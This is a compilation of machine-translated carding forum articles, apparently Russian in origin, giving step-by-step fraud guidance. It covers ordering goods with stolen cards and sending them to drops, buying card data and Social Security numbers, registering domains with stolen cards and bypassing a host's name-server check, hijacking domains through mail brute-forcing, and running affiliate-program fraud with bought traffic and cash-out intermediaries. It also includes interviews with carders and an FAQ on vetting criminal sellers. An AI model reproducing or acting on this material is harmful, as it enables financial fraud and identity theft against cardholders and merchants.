Endless story
Despite everything, carding continues to live. And for every new trick of the shops there is a remedy. The main thing to remember is that everything ultimately depends on the manager of the online store who deals with your order. I had a case when the store did not want to send me the goods, requiring a phone call. Then I wrote them a plaintive letter that now I do not have access to the phone, and the digital camera is intended for my son, who has a birthday in three days. And the gift is exactly the one that the son has long dreamed of. I asked to send the purchase and promised that I would definitely call the store in a week. And it worked! So you should never forget about the human factor.
Clothing carding scheme
- Carder, having previously organized his security and anonymity on the Web, places an order in the online store.
- The store may ask to call and / or send a scanned credit card. A scan of a credit card is drawn by a special person. The call to the store is also made by a person with anti-AON, so that everything looks as if the legitimate owner of the card is calling.
- The store sends the purchase to your person (drop) in the country where the online store is located.
- The drop sells the goods on the spot, keeping some of the money for himself, or sends the goods to you.
Online credit cards
Many US banks provide their customers with access to credit card information on their banking website. By entering the card number and password on the site, the client can view transaction statistics, change the address, etc. In fact, you can make a card with online access from any credit card of the respective bank. To do this, in addition to the information about the credit card, you only need to know the social security number of its owner, which is known only to him. But on the internet, you can find people who have access to databases of social security numbers. And for 5-10 bucks, they'll give you a Social Security number by the name of the cardholder.
Proxy servers
It is best to buy proxy servers, then you immediately get exactly the server that you need. But if you are a novice carder and you don't have much money, then you can take the server addresses on sites dedicated to computer security. Proxy Checker will help you sort servers by state and city. Now that you have found the server of the state you need, substitute the server address and port into your browser.
To make sure of your anonymity, go to privacy.com and view the package path from privacy.com server. The last address of the packets should be your proxy server.
The scheme of work of the suitcase, it seems, lies on the surface. This attracts many novice carders who find everything clear and simple. In fact, it is not so easy to do clothing carding.
The most correct hosting
Any carder should have a number of irreplaceable things. This is a credit card, good hosting (to fool the naive bourgeoisie) and, of course, a domain. Domain is not an empty phrase and a show-off subject. It is the sonorous name of the project that attracts new clients and commands respect for its owner. Of course, in order not to have any problems after registering a domain, you should pay great attention to two things. First, the domain name, which, as I said, is of great importance. And secondly, it is wise to choose a hosting that will provide the cardboard lover with the coveted name of the second level. If the first point remains on the conscience of the carder, then this article will help you figure it out with the second.
Hosting legend
As already mentioned, you need to choose a good hosting in order to register a domain. Companies providing such services are divided into several types: those that register a name on their own server and provide the owner with certain rights (FTP / WEB / SSH access), as well as giving only a zone for the domain. In this case, the primary and secondary DNS servers must be the property of the client. There is also a third option - the golden mean, hosting, which allows you to transfer zones to another DNS server. This is the famous verio.net. This company will be discussed in this article.
In general, there are a lot of alternatives to Verio - the same register.com. But all of them, as a rule, freeze the domain with a negative credit card balance. In the case of Verio, this does not happen - the domain dies only after the period of the zone's existence. And, as you know, it can be extended without any problems. In addition, if the money on the card runs out, Verio will leave the client not only a domain, but also a control panel where you can perform a number of actions: change a zone, add a mail account, upgrade a plan, view statistics, and much more. I will definitely tell you about this, but everything has its time.
Registration is a delicate matter
So, you were inspired and wanted to become a Verio client. You have chosen the right path, because if the domain is registered according to the following tips, there will be no problems. For successful registration, you will need a working (read - with a positive balance) credit card with a cvv2 (special security code) and a little patience. Speaking of credit cards, quite recently Verio was almost the only company registering domains without a cvv2 code. Now everything has changed and the corresponding field has been added to the form. But for a carder like you, getting cvv2, I think, will not be difficult.
On the home page, on the right side, you will see a small form. Enter your desired domain name there and click "Check it". You will be taken to the first stage of registration - choosing a domain. If the name is free, a message will appear, otherwise a form for selecting an alternative domain will be displayed.
When the name is determined, the second step of registration comes - choosing a hosting plan. You will be offered two options - buy a zone only for "parking", or choose a special plan for it. Click on the second item and you will be taken to the page with the choice of the type of registration. I advise you to choose UNIX GOLD PLAN. Even if it is expensive (about $ 100 per month), you will definitely not have problems with transferring zones. Although there will be no difficulties with any plan, since there is one secret that allows you to deceive the protection of the company. When the actions are confirmed, you will be asked for your personal information. Of these, you, of course, will only enter your e-mail, the rest of the information will be about the card holder. By the way, your personal account on Verio will be assigned to this address - when registering a domain for the second time, you only need to enter your password and / or information about a new credit card.
At the penultimate step, the carder will have to enter information about the card - I will not dwell on this, since you perform such operations very often.
Finally, to complete the deal, confirm your purchase and receive a commendation from Verio. The company will promise to send you an email after checking your credit card. Now one caveat: if you receive two letters with an interval of about 10 minutes, everything is fine, the request passed, and the domain is crammed behind you (the first letter contains a registration request, the second contains hosting rules). Otherwise, the card is invalid and you will have to make a new deal.
In a day, another letter will come to your mailbox, this time with data about your domain. Now you can jump for joy and wait for the zones to update and your domain will respond to requests. At first, be content with the IP address, which is assigned personal FTP access and the name control panel. In addition to this, DNS servers and hosting rules will be provided.
The delights of the Control Panel
Now you can check the Control Panel's work and log in under the issued account. The panel is located at ip-address/stats/. To access it, a 6-digit login is issued, which is part of your domain (for example, for
www.supercard.to the login will be superc). The password is generated from 8 randomly selected characters.
When you're inside, it doesn't hurt to change your password to a more convenient (but no less complex) one. This is done in the Change Password tab. Now is the time to start distributing e-mail accounts. If you took a plan higher than DNR (Domain Registration Only), then you will be provided with ten POP3 / IMAP accounts, as well as access to SMTP. To add a new POP3 record, go to the appropriate section and assign a username and password to the user. After that press Change, and the account will be successfully added to the database.
Sometimes you have to add a redirect record, that is, the address from which incoming letters will be automatically forwarded to the soapbox specified in the form. There is nothing complicated with this, you just need to note the value of the form a little higher, called "All email not specifically forwarded will be sent to". If the account does not exist, all letters will be automatically forwarded to this address. This is very convenient and allows you to completely control the mail system of your domain.
There is a nice Webmail shell for working with e-mail. Previously, it was included in any hosting plan for free, but now 10 American presidents are asking for it every month (they found something to cash in on). But it's worth saying that Webmail scripts are made with a bang - they contain everything that would be useful to an ordinary user. Link to Webmail - supercard.to
There is also an interesting "Domain Manager" section at the top of the toolbar. You can register a virtual domain there without any problems. It will be tied to the main one, and payment will be made using the same card. So, just fill out the registration form and don't worry about paying for the name - everything will happen automatically. By the way, the registration procedure will take minimal time, since you just need to put a checkmark confirming that the client is familiar with the hosting rules, and then carefully fill in the list of new names and the registration period (from one to ten years). If everything is done correctly and the domain is not busy, you will be asked to wait a day while the zones are updated. There are no particular problems with creating a virtual domain. By the way, you won't be able to change, let alone transfer the zone of such a virtual name. We'll have to be content with the Edit Pointers section. There, it is only possible to bind a specific host to an IP address
(creating a third-level domain).
Creating your own domains
When you get full access to your domain zone, it becomes possible to create your own subdomains (already at the third level), as well as other very useful DNS fields. All this can be done in the "Zone File Editor" tab, which is located in the first control item "Manage My Web site".
Go there and you will see a file that contains the minimum fields. First of all, it is SOA. There are two email addresses for Postmaster and Hostmaster. This is followed by the sequence number, update time, and expiration date of the zone. Just below the file you will see a form for new entries that you need to fill out. There are several options that are allowed to be added. Here is some of them:
A. Needed to bind a new subdomain to an IP address. For example, subdomain.supercard.to entry. IN A 127.0.0.1 would mean that the name will refer to a local address. By the way, the dot at the end of the subdomain is required - it means the end of the record (otherwise the address will look like subdomain.supercard.to.supercard.to, that is, it will be appended to the main name).
CNAME. This parameter allows you to create an alias for an existing name. For example, admin.supercard.to. IN CNAME supercard.to. will bind the subdomain to the main host, making these entries equal.
MX. This parameter stands for Mail eXchanger. All SMTP services operate on the option value by first requesting it from the name server. This is convenient because it makes a permanent host with smtpd running on it for each domain. Usage example: smtp.supercard.to. IN MX 10 222.222.222.222. The number 10 means the priority of the record, therefore, there can be several MX fields.
NS. The most interesting option, since its meaning is the NS server for this domain. As I said, some hosting services allow you to transfer records from one server to another. Verio is no exception, but there is one caveat. The fact is that if you chose the DNR plan, you will not be able to change the NS server (the script will swear at the wrong registration plan). Everything would be bad if not for one trick that allows you to deceive this protective system. If the NS server address contains the "verio" substring, the request will be processed as needed, and the address will be written to the database. It is very simple to implement in practice: in the config, the following line is assigned to your server:
verio.cardns.net. IN A 222.222.222.222,
where 222.222.222.222 is the server IP address. After that (when the zones are updated, and the host is visible from the global), you can safely transfer the DNS server. We fill in the form as follows:
supercard.to. IN NS verio.cardns.net.
Verio will swallow such a request, and in a day the zones will be transferred to your car. Naturally, you will have to take care of this in advance and create a config for your domain (it may be the same as the one you edited on the Control Panel).
It is worth talking about the design of the direct domain zone (it will be it that will be transferred to an external server). To do this, you need to specify in the main named.conf information about the location and meaning of the zone. This is done with the following data block:
Code:
zone "supercard.to" {
type master;
file "supercard.to.hosts";
allow-query {any; };
};
Here the name of the zone is any name (if only you understand what this block leads to), the type is the purpose of DNS, master or slave (in the second case, you need to create an internal block with masters-servers). And finally, allow-query handles requests from specific addresses (in our case, anyone can request information about the domain). There can be many parameters in the zone {} block, each of them is responsible for a certain thing. See man named.conf for details.
Now you can create a supercard.to.hosts file, which, as I said, does not differ from the zone on verio.net. You can only change the first parameter $ TTL, which means the period for which the zones are updated. For example, its value 1d indicates that synchronization will occur every day. It is also permissible to specify the time in seconds. After all modifications to the bind configuration file, you need to restart the daemon. To do this, send signal 1 to the process: killall -1 named.
A security hole in Verio will benefit the carder, since when choosing a DNR plan, he can easily drag zones to a separate server and enjoy life.
TXT, SRV. Text and service records that can be made to clarify any information. So, for example, you can specify some email addresses. You can send mail to them in certain cases (Spam, Abuse, etc.).
You will not find the last PTR parameter that organizes the reverse resolution (the IP address in the hostname). This is due to the fact that the second zone is kept by Verio and is kept in strict confidence. You can easily do without PTR by creating your own beautiful virtual hosts (even in one direction) using option A.
After such a description of the parameters, it will not be difficult for you to understand the registration of options or the transfer of zones. By the way, it will be quite logical to transfer them, since if the balance on the card is negative, Verio will simply block FTP and WEB access to the site (only the Control Panel will remain). All changes in the zones will be immediately sent to the e-mail (under which the domain was registered). By the way, don't forget to confirm your editing. You will be prompted to do this when you click on Submit.
Account renewal and plan upgrade
Like any hosting, Verio supports registration extension. In other words, when your domain expires, you can easily renew it. You may need to find another credit card. To do this, select the "Update Method" tab in the Billing section of your control panel. Next, determine new terms and pay with a credit card with a positive account.
Upgrading the plan is a little more complicated. That is why I advised you to choose it immediately upon registration. This is what happened in my case, when I chose the Silver Plan and wanted to change it to Gold. As it turned out, for this it was necessary to write a letter to the Verio administrator with a request. Then I got a response that my card expired and now I need to send new data to him. Everything was done as directed, but the administrator's response shocked me. In order to upgrade the plan, I had to call the States by phone and confirm my credit card information by voice. I gave it up and ended up with a silver plan. I think you would do the same.
As already written, after two months with a negative account, Verio will cut off your FTP and Web access. More precisely, it will erase all your directories and files, the entrance itself will be possible. To have time to back up all the important information, just keep an eye on your mailbox - three days before the event, you will receive a letter in which it will be written about the disconnection of your account.
Forgot your password?
Anything can happen, and anyone can forget the password on the Control Panel. Verio has an automatic system for sending this information.
When you log into the Web admin area, you will see the standard Apache password prompt. If you enter it incorrectly three times, the server will redirect you to page 403. In addition to swearing about an incorrect password, you will find a link leading to a script for sending a forgotten password. No control phrase and additional data - just click "Send", and the info will go to your soapbox (to which the domain is assigned).
By the way, there may be a number of ideas about stealing a domain from the owner. It is enough to muddle up a simple POP3 brute-force (or just take away the soap that the domain was registered to) and request data for it - that's it, your name! True, keep in mind that the owner can easily return it, but nothing prevents you from sending the password a second time.
Thanks to everybody, you're free!
Any hosting can be described in a similar way. Each has its own advantages and disadvantages, I say this with complete confidence, as I was a client of five different companies. And this article would not have been if Verio had not met all my expectations. Of course, it has its drawbacks, since there is no ideal hosting, but I was very pleased with the preservation of all zones and access to the Control Panel after the expiration of the credit card. This will not leave you indifferent either, because any carder does not like such global problems as the loss of a domain. I think you are no exception.
Verio is far from the only company providing second-level domain registration service. Here is a short list of similar servers.
Questions?
The control panel on Verio.net has many Help links. For example, you can find help for each hosting plan, FTP access, webmail, virtual domains, zones, etc. In addition, as stated on the home page, any questions asked on the soap will definitely be resolved in a short time.
Working with DNS
To check the health of zones, you often have to use the host utility. Here are some useful options that might interest you:
host -l hostname - displays a complete list of subdomains associated with hostname.
host -t TYPE hostname - displays the value of the TYPE parameter, which can be MX, NS, etc. All options have been described in detail.
host hostname - convert hostname to IP address.
Interview with live carders
Some scared people, these carders. You knock on their asya, offer to conduct an interview, explain that the private infa has not fallen into your head, that you just want to talk "for life." So no, they freeze tightly. After all, I, perhaps, Colonel Musorov from the FBI, I sleep and see how to put everyone on the bunk
.
In short, they spoiled my nerves pretty much. But the world is not without good people. Two responded to my proposal (real names and nicknames, of course, are not published - editor's note).
XS: How long have you been doing carding? How and why did you get involved in this? What was the first thing you did?
dos: Seriously engaged in clothing carding for about a year, quit 4 months ago. The first thing that was sent was a simple digital camera. He was happy then like an elephant. In general, I was not going to become a carder, I just knew that there were such people. But somehow a friend pointed to one of the carder forums. First I read it out of curiosity, then I decided to try it. I bought information on several credit cards with my own money, and off we go. I quit carding because I was thrown by two people in a row. They threw on expensive electronics, which I ordered, but did not receive my share. My hands just dropped, I didn't want to continue. Carding is actually a very nervous activity.
XS: How seriously do you take your privacy? For example, do you change apartments for conspiracy purposes? Do you trust trusted people with private information?
dos: Only paranoid people change apartments. I trust Infu. It is much more important not to chat about your occupation right and left to all your friends and acquaintances.
VG: It is enough to understand what you are doing and how it can affect your future future. For example, this interview. In my opinion, it turned out to be good thinking out loud about anything. For me, there are no verified and unverified people. There are friends, and there are those with whom I only have business contacts.
XS: How do you think carding is unambiguously stealing or being carried away by knowledge about the structure of payment systems?
dos: Carding is a theft that does not explicitly target a person. Banks and online stores suffer losses from carders, but not specific people.
VG: The term was not invented by me. And the one who invented it gave a specific explanation for it. Carding is a scam using credit cards and everything related to them (which is why everyone who was tried for carding was tried under the article for fraud, not for theft).
XS: Do you have a legal job? If yes, tell us about it, if not - why not get a job, and who would you prefer to work with?
dos: I am a first-year student at a university. In the future, work will be related to information security. It is quite possible that the information will have to be protected from the same carders.
VG: Legal or hired? There is a legal one, but there was a hired one (when you work in a company), there was even a few, but ... In general, I will be happy to find a job when in our country they begin to pay properly for labor, and not at 10 hour busyness. At the same time, your boss drives new six hundredths and sevens every day, and his son, who works with you, but on a 2-hour daily schedule and 2-3 days a week out of five, gets $ 5,000. And then "for ice cream". I would prefer to work in one of the special structures. For example, the letter F.
XS: How difficult is it to be a carder now? What knowledge and qualities do you need to possess first of all? What is the specificity of modern caring, has anything changed in comparison with the past years?
dos: Carding is going through tough times right now. Knowledge depends on the direction of caring. If this is the Internet, then you need to be able to organize well the protection and anonymity. If this is real carding, then NLP techniques and charm are very useful.
VG: Nothing has changed. Carding has always been a business for morons. This is not hacking, which requires knowledge of operating systems and programming. You don't need to have any specialized knowledge in caring. Most of the "current" carders are very stupid people who cannot do ANYTHING except to steal something somewhere.
XS: What are the most popular ways of caring now? Which are considered the most professional (highly qualified)?
dos: There is no most popular way, everyone makes money as they can. The most professional, probably, are the hacking of bank data transmission channels and various algorithms for encrypting electronic signatures.
VG: Probably the most popular auctions. Because they require a minimum of knowledge. More precisely, they are not required at all. The most professional is probably plastic. In it, at least you need to understand the structure and algorithm of work.
XS: What do you think is the ratio of serious carders (people who study new payment systems in depth and implement their own methods of circumventing security) to guys looking for easy bread with a minimum of time?
dos: A huge number of people are spinning around carding, but only one percent of them actually do something. In principle, there is no easy bread in carding. Maybe in 1997 you could have had something without bothering to study the topic, but not now.
VG: There are very few mature people now. 70%, if not more, is a riffraff who stupidly makes copy / paste of information from some textbook paypal.txt into a web browser. Yes, they may know all the settings and capabilities of accounts in this payment system, but personally I do not consider this to be serious knowledge from the field of carding, since most of the users who use the system legally know this.
XS: Do you think carding has a "narcotic effect"? Does addiction to easy money occur, and how serious is it?
dos: There is something like that. Somehow, with a temperature of 40, I could not move away from the computer, because it was carding very well.
VG: It has the effect of realizing what kind of ass we live in our country and how absurd and insignificant life here is. Although each is different. Here, again, everything depends on the person himself. For some, this is nothing more than a game, the purpose of which is to do nasty things to another.
XS: How actively are law enforcement agencies fighting carders now? How successful are they at it? What organizations are involved in caring problems? Why do carders usually come across?
dos: They are fighting, and they are very good. The FSB is doing this together with banks. Raids are organized about once every six months. Carders come across because of their carelessness, as well as because of the bases.
VG: In my opinion, there is no activity on their part at all. They don't work there either. They understand that it makes no sense for them to waste their energy, time and money to "save" the citizens of the United States (or any other country). Do the work that the foreign police should do. Although with thugs who are trying to throw here (on the territory of Russia) - they are fighting with them. But such, in my opinion, are very few. They are mainly dealt with by the internal security service of a particular bank.
XS: Have you personally had any problems with cops? If so, tell us how you got caught and why. How did it end?
dos: I had no problems. But there was a case when I was carding all evening, and then I noticed that I was working without a proxy server. That is, they could potentially track me down without any problems. Then he walked the streets for a week, looking around. Everyone seemed to be watching me.
VG: Me? Problems? What are you talking about? I am a law-abiding citizen and honestly pay taxes.
XS: What are the basic rules every carder should know (if he doesn't want to be pissed off)?
dos: You need to be anonymous. Work with people you trust. And don't talk a lot about what a tough carder you are.
VG: The same as for a hacker: do not expose your IP, do not expose your data. Simply put, make sure that there is as little evidence of your involvement in any case as possible. Or not at all.
XS: Are there professional teams in Russia that have a monthly turnover of funds from carding in the hundreds of thousands or even millions of dollars?
dos: There are. Naturally, I will not name them. Such teams are usually called families. But they cannot be called purely Russian, since they are scattered all over the world.
VG: Watch the news on twee, there they often started talking about them recently.
XS: Is it now possible to shoe a gigantic amount at a time with the help of carding? Let's say ten million bucks? How is this possible in general terms?
dos: It is possible, but very, very difficult. You can, for example, penetrate the banking network without anyone noticing, and transfer money from several accounts to your own. Then you need to remove the money from the account, while the bank has not cut anything, and get out to some island in the Pacific Ocean.
VG: Even though the definition of caring is still "credit card fraud," it's actually a broader topic now. It was joined by such directions as fraud with accounts in different payment systems (PAYPAL, for example). Due to the development of Internet technologies and electronic payments, it is possible to "put on shoes" for 100 million, but then it will no longer be caring, but hacking. Or as it is officially called in the USA - identity theft. You take someone else's username and password for accessing his bank account via the Internet, and if there are 100 million there, transfer them to your account. As for credit cards ... as I said earlier, watch TV. It tells about the methods and the amounts that are available from these methods.
XS: Tell us, what are the most sophisticated methods of protection used in credit cards now? And in general terms, the ways to bypass them used by carders.
dos: Yes, as such, there are no new ways. For example, a visa, for example, recently took and sharply reduced the percentage of unverified transactions, because of this, many billing systems were closed, and carders lost another opportunity to earn money.
VG: All credit cards work the same way. And in relation to the network, we cannot talk about how to protect the cards themselves. Here they no longer play any role. Another thing is how to protect the transmission and storage of information from these cards on the Internet. And these methods, as practice shows, are complete garbage ... Since now 80% (or even 90%) of all carder cases are carried out via the Internet, everything revolves around the theft of information from the Internet. And here everything is as usual ...
XS: Is there any difference between carding in Russia and carding in other countries? For example, in America? Maybe there is some specificity.
dos: Every American is shaking from birth for his credit history, which includes all major purchases, etc. If a person is involved in something bad, it will immediately affect his credit history. And then he will not be given a loan, he will not be hired. Therefore, most American carders are emigrants from the CIS.
VG: Yeah, different. Blacks prevail there.
XS: Is there a carder "scene" as such? Does the carders community have their own stars, legendary personalities? How developed and large is the carder community?
dos: Of course there is. I will not name names. It is difficult to assess the entire carder community. In Russia, I think, there are several thousand people.
VG: One boy has already told about this in your magazine a year or two ago.
XS: What sites / IRC channels are focal points for carders? Where do the really knowledgeable people gather? What, in your opinion, are the most worthy network resources on the topic of caring?
dos:
www.carderplanet.com.
VG: Decent people do not gather on sites or thematic carder channels. Karderplenet.com has already been written about. Those interested in carding can apply there.
XS: Which countries in the world (and in the CIS) are leaders in carder activity? Is there some kind of dependence, for example, on the general standard of living?
dos: In the world: Russia, America. In the CIS: Russia, Ukraine. Dependency does not exist due to the fact that all the money that carders receive is distributed within a small group.
VG: In the world - Indonesia, as well as the countries of the former socialist camp. In the CIS - Ukraine, Russia, the Baltics.
XS: How do you see carding ten years from now? Where do you think everything is going?
dos: In ten years, IMHO, credit cards will finally disappear. But there will undoubtedly be people who will engage in electronic cash flow fraud. In the form in which carding exists now, everything is moving towards the decline of carding.
VG: With the development of wireless technologies and technologies based on this technology of payment for goods, as well as technologies of "physical" payment by cards via the Internet (when, in order to make a payment on the site, you must insert your own or someone else's card into a card reader connected to a computer, and enter a few pin codes), carding will turn into a cross between phreaking and hacking. We'll have to steal information, and then use it by emulating it through some device.
XS: What advice would you give to guys who don't know what carding is and how it is in general, but want easy money, want to become carders?
dos: The main thing is not to hope that money will immediately flow like a river. Carding is very difficult. To begin with, you just need to start hanging out on carder forums, delve into the topic, ask questions. After a while, perhaps some work will turn up. Or you yourself will understand that your knowledge is already enough for carding. It is important to understand that no kind uncle will explain what is being done and how - you will have to get to everything on your own.
VG: Easy money is rare. Therefore, if you want a good and human life, study, get high-quality professional knowledge and leave here @ ^ #! In general, I was not going to become a carder, I just knew that there were such people. But somehow a friend pointed to one of the carder forums. First I read it out of curiosity, then I decided to try it. I bought information on several credit cards with my own money, and off we go.
This FAQ contains simple recommendations that will help you choose a reliable seller when buying goods or ordering services and not become a victim of scams. I draw your attention to the fact that these are recommended, not critical requirements, and not everyone who does not meet them is certainly scammers.
1. Positive feedback. Good sellers usually have many references from satisfied customers. Start by checking the reviews on the resource, usually they are published in the topic with the proposal. Reviews can be faked, so pay attention to how long it took from the moment the "satisfied client" was registered until the moment he wrote a review in the topic, as well as how many messages the user left in addition to the written review. Reviews of old and reputable participants are dear. Perhaps the seller has published several proposals on the project, and in each of them you will find feedback on working with him.
2. No complaints in the Arbitration section of the project. All complaints from customers (and not only) are usually published and considered by the administration in the Arbitration section of the project, do not forget to look there when assessing the reliability of the seller.
3. Availability of successful transactions through the GARANT service. After a successful transaction, a representative of the GARANT service always informs other participants about this in the seller's topic. Only Super-Moderators and Project Administrators can write on behalf of the GARANT service. Feedback from the GARANT service is more reliable than any user feedback.
4. Status CHECKED SELLER. The member's status on the forum should be as high as possible; on our forum, the administration recommends working only with members with the CHECKED SELLER status. These participants are highlighted in green, they are checked by the administration for the quality of goods / services. We check the presence of profiles on other resources, the presence of negative and positive information in search engines, and inform other members of the resource about this.
5. Paid advertising. See if the seller has paid ads. Usually scammers do not need this, they have a different task, to scatter offers on the Internet, find a victim and deceive. On the other hand, reliable and honest sellers who want to constantly sell their goods on the site, in most cases, buy advertising space. (!) Paid advertising does not mean that it is a CHECKED SELLER, you can order advertising without going through the verification process.
6. Work through the GARANT service. You can always conduct transactions through the GARANT services of third-party forums. The GARANT service is a reliable protection against fraudsters, but only if you do not forget about the other 9 points of this FAQ.
7. Do not pursue cheapness. Sellers who respect their work have enough customers and know the market well, so they will never sell their goods / services for a penny. The cheap price is a scam's tool, and your greed can lead to poverty.
8. Also, do not forget that the topics of verified sellers are placed in the Verified sellers section
Happy shopping.
How the newbies of carding did business
This article will describe one of the few carding methods that are interesting for those new to this business. I will warn you right away that all of the following should not be applied in practice, because it is illegal and may lead to punishment under Articles 272, 273 of the Criminal Code of the Russian Federation, and also be considered fraud. The author of the article has never used these materials in practice. This article was written for educational purposes only.
Let's take a quick look at the basic idea behind this method. There are many organizations on the Internet that do business on the Internet. Very often you can find sites that offer hosting services, server rental, and sell templates and scripts for webmasters. These companies advertise their services in various ways, and one of the methods of advertising is affiliate programs. They can be different, but in most cases you are offered to advertise a product or service on your website, usually through a banner. For each client who came to the link from your site and bought this product, you receive a percentage or some fixed remuneration. Since such services or goods are usually virtual, the company offers convenient payment methods such as electronic payment systems and, of course, credit cards. Generally,
Now think about what will happen if someone makes a website, creates the appearance of its relevance and attendance, and places affiliate program banners on it. Let's say his partner is a hosting company. Further - he himself acts as a buyer: he goes to his site, clicks on the banner and gets to the partner's page. He chooses the tariff plan he is interested in and buys hosting. Only now he will not buy it with his own money, but with someone else's credit card. As a result, everyone is happy: the partner acquired a client, and the carder received a percentage of the transaction. How to get this percentage and turn it from virtual money into real money will be described in detail below.
So, first you need to:
- Start-up capital (approximately $ 300-400).
- Knowledge of HTML, graphic editors.
- Basic knowledge of English (knowledge of other languages is welcome).
- Computer, internet access, straight arms, a little gray matter in my head.
Estimated profit: from $ 500 per month and above.
We select a partner
To begin with, we need to find a partner whose services or goods will have to be advertised. It is useless to look for a partner among our companies and companies in the territory of the former USSR. Firstly, because it violates the unwritten laws of carders, and secondly, because it is not good to deceive your own people. Moreover, there are many more similar companies abroad, and they pay very decent money. Finding a partner is not difficult, for this you need to go to Google (
www.google.com) and type in the search bar: "affiliates program" (affiliate program). On request, Google will display a huge number of companies offering various goods and services and inviting you to become their partners. You should not rush to the first site that comes across; first, it is better to go through different companies and study their conditions. The best thing is, of course, to find a partner, which will pay the earned money using WebMoney or Bitcoin. Companies offering payment methods such as paypal or cash should be dismissed immediately.
Next, we will be interested in the payment methods with which customers can pay for their services. Naturally, we need a credit card payment method. Now we need to pay special attention to what exactly the future partner offers. The product must be virtual. Books, T-shirts, and even more so laptops are not suitable. In my opinion, it is best to advertise hosting and templates. Well, the sweetest bit is dedicated servers (server rental). This pleasure is not cheap, therefore the carder will receive rather big percentages.
Now you should check how easy it is to scard a given product or service. Try it yourself first, and if everything goes well, then this company is suitable for us. Yes, before I forget - pay attention to how often you can get your money. I don't think it's worth working with a company that pays interest every six months. Fortunately, there are almost no such maniacs.
In addition, there is such a thing as "initial hold" - this is the time during which your first money is frozen. It seems to me that the best choice would be a company that pays out money once a week and has an initial hold of 2 weeks. But this is very rare, usually payments are made once a month.
So, let's summarize. The partner must:
- Be outside the former USSR.
- Accept credit cards.
- Pay interest on WebMoney, E-Gold or wire transfer (bank transfer).
- Easy to card.
- Sell virtual goods.
- Make payments at least once a month.
We make a site a la "Horns and Hooves"
Well, you've found a partner, now you need a website that will advertise it. First, you need to decide on the hosting and domain name. Hosting and domain definitely shouldn't be ours. Western companies are afraid of people from the CIS like fire, thinking that we are all scammers.
All this stuff can, of course, skard, but it's better to buy hosting. It will not be very expensive, take the cheapest tariff plan, because databases and all sorts of gadgets, such as ssh access, you are unlikely to need. The domain can be scored, but you can also buy it, since it is inexpensive. It will be very disappointing if after a month of work all this is taken away from you, and you will not even have time to recoup the money spent. It is better to register the domain in the zone .com, .net, .org.
Now you have to work as a webmaster. Your site must have an idea. This should not be Vasya Pupkin's page. You can, for example, make an entertainment site, an online magazine for reviewing new hardware-software products, or whatever is closest to you. Keep in mind that almost all Western companies will refuse to work with you if your site contains pornography, calls to racism, propaganda of weapons or drugs. The topic should be familiar, not arousing suspicion and unnecessary questions.
Website design must be solid. You shouldn't make flying stars or jumping hares, that is, everything that is popularly called pop music. Choose soothing colors, familiar designs. Your partner will definitely want to take a look at the project, and he should in no way raise suspicion. You can also take a more cunning path, for example, make a website in Chinese so that the partners do not understand anything. This is done easily: just go to any Chinese site, copy a lot of hieroglyphs from there, and, having changed their places, paste them into your site. This is a very convenient solution, since there will be fewer questions, and the partner will be happy - after all, there are a billion Chinese, and this is a very large market for future clientele.
After the project is ready, you can go to the partner's website and register. If everything goes well and he does not have any unnecessary questions, you will soon receive a letter with congratulations and further instructions. Hang banners on your site and get down to work.
Let's summarize briefly. Our site must have:
- Hosting and domain that do not indicate membership in the CIS.
- A meaning and idea that will not arouse suspicion in a partner.
- Solid design, content and structure.
Carding features
Now that you have a website that advertises a partner, it's time for the gala part. There are many subtleties here. It will not be possible to tell about everything, tk. each partner has its own troubles. But the basic principles are worth discussing. First of all, you will need the cards themselves, which you will drive in (pay for the sponsor's services). If you already have your own database or you can hack online stores, then one of the expense items disappears. Well, if not, then this is not a problem at all. I don't think it's worth explaining that no one accepts the generated cards for a long time. Cards (hereinafter referred to as ss) can always be bought on the Internet from people who are engaged in their production and sale. You can find a cc seller on karder sites and forums. When choosing a seller, be sure to find out how reliable he is. Usually on the forums you can see the date of its registration and reviews of other buyers. You will need cards with CVV2 codes. Most likely you will be using cc from America. The average price on the internet is $ 2 per cc.
Take not one or two cc at once, but 50-100 pieces. In this case, you can get a discount from the seller. It is best to buy debit ss, since the chargeback for them takes longer, 3-4 months.
However, cards are not everything. It is worth taking care of your own safety. For this you need proxy servers. Do not rely on proxies taken from public sources, because most of the processors also have these lists and strictly make sure that the customer making the payment does not go under them. We need SOCKS proxies. It is desirable that the proxies that you will use are of the same state as your ss. Therefore, you will have to purchase them from people who specifically provide such services. You can also find them on the carder forums. On average, access to the anonymous proxy database will cost $ 60 per month.
But that's not all. What will a partner think when he discovers that out of three users a day who visit your site, everyone immediately clicks on the banner and buys its services? The situation is very strange. I can say right away that letters to a partner with flattering reviews about banners with an efficiency of 100% are unlikely to convince him. This means that our site must have good traffic, or at least pretend that he has it. On average, the efficiency of a banner is 0.1%, so we will not deviate from this rule - for each drive in, create traffic of about 1000 users. This can be done in different ways. You can write a script yourself, you can find free scripts on the Internet or buy. But the easiest option is to buy traffic. The cost is different, on average - $ 1 per 1000 visits. The people who do this are called trafagons, and they can always be found on the same carder forums.
If you have all of the above, you can start working. How many cards to drive in a day depends on your impudence. If you drive in 1-2 cc a day, it will be quite normal.
So, for a successful drive you need:
- Have cards.
- Have a proxy for the same state as the map.
- Drive traffic to your website.
We take away the cache or the subtleties of cash out
Let's say everything went well and you have been working for a month. Naturally, it's time to think about how to collect your money before the chargebacks come in. If your partner sends money to WebMoney or Bitcoin, then everything is very simple - just register an account in the desired system and transfer money there. I think everyone knows how to cash out Webmoney, it is written in detail on their website. In the case of Bitcoin, you shouldn't be intimidated either. There are many exchange offices on the Internet - you will read about them in the article “8 tricky ways to cash out money from credit”.
It is more difficult if you will be transferred the amount by bank transfer. Although the whole difficulty lies in the fact that you have to find a dealer. As always, you can find it on the carder forums. The raider will take a percentage from you (which one - you will agree with him). You will also have to agree on how it will be more convenient for you to receive money. I must say that cashing out money is one of the most important points. Before contacting a dealer, you should look at his recommendations. If the dealer is good, then the people who worked with him will definitely leave reviews about him. A problem may arise here: usually a cashier, especially if he is a pro, is not very profitable to work with amounts less than $ 1000. Therefore, he may not accept a smaller amount. In this case, you can act in different ways: you can still persuade him to accept $ 500, or you can just save up more money in the account.
By the way, it is better to agree with the dealer in advance, even before connecting to the affiliate program. The fact is that the account to which your money will go may have to be indicated during registration. It is better if everything is ready in advance. This will save you from unexpected surprises.
